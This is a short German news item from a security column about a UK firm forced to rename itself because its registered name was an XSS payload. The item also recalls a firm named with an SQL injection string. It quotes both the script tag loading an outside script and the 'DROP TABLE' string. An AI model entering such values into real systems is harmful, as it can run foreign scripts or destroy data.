l+f: Wenn der Firmenname zum Sicherheitsrisiko wird

Eine britische Firma musste ihren Namen ändern, da er Cross-Site-Scripting-Angriffe ermöglichte.

Lesezeit: 1 Min.
In Pocket speichern
vorlesen Druckansicht Kommentare lesen 22 Beiträge

Bundeswehr/Stefan Uj

(Bild: antb/Shutterstock.com)

Von
  • Christoph Böttcher

Eigentlich wollte ein britischer Entwickler seiner neuen Beratungsfirma nur einen "lustigen und spielerischen Namen" geben. Dafür nutzte er HTML-Code, der einen Cross-Site-Scripting-Angriff auslösen kann. Verantwortliche des Companies House, die das britische Handelsregister führen, fanden das wohl weniger lustig.

Wie der Guardian berichtet, hieß die Firma ursprünglich "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD. Von manchen Websites könnte dieser Name als ausführbarer Code behandelt werden. Das in diesem Fall aufgerufene Skript führt dann ein Test-Skript der Seite xsshunter.com aus, mit dem man Schwachstellen für Cross-Site-Scripting aufspüren kann.

lost + found

Die heise-Security-Rubrik für Kurzes und Skurriles aus der IT-Security.

Gegenüber dem Guardian sagte der Entwickler, er hätte erwartet, dass der Name kein Problem darstelle. Die Regierungsseiten hätten einen guten Ruf in Sicherheitsfragen und es gab auch früher schon ähnliche Firmennamen. Das sah die Behörde offenbar anders: Der Firmenname lautet jetzt THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD.

In einem früheren Fall wählte ein Unternehmen einen SQL-Befehl als Namen aus: ; DROP TABLE “COMPANIES”;-- LTD konnte dazu führen, dass SQL-Tabellen gelöscht werden. Hier musste sich die Firma nicht umbenennen, allerdings heißt es im Handelsregister lediglich "Company name available on request".

(cbo)